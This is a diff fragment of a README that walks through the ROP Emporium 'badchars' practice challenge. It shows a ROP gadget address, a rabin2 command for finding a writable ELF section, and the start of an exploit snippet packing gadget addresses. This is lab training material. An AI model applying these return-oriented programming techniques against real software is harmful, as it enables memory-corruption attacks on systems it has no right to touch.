iagrant/binex/ROPemporium/4-badchars/README.md

 0x0000000000400b3b: pop r12; pop r13; ret;
 ```

-We also need to find somewhere to place the string into memory.
+Now that we can load our string into memory, we need to find somewhere to place the string into memory.
 We can find this by looking at the ELF's sections.

 Using `rabin2` from radare2
 ```
 rabin2 -S badchars
 ```
 ![data section](imgs/64bit/data.png)

+Code Snip of it all together
 ```
 data_start = 0x601080 # pop_r12_r13 = p64(0x400b3b)
 mov_r13_r12 = p64(0x400b34)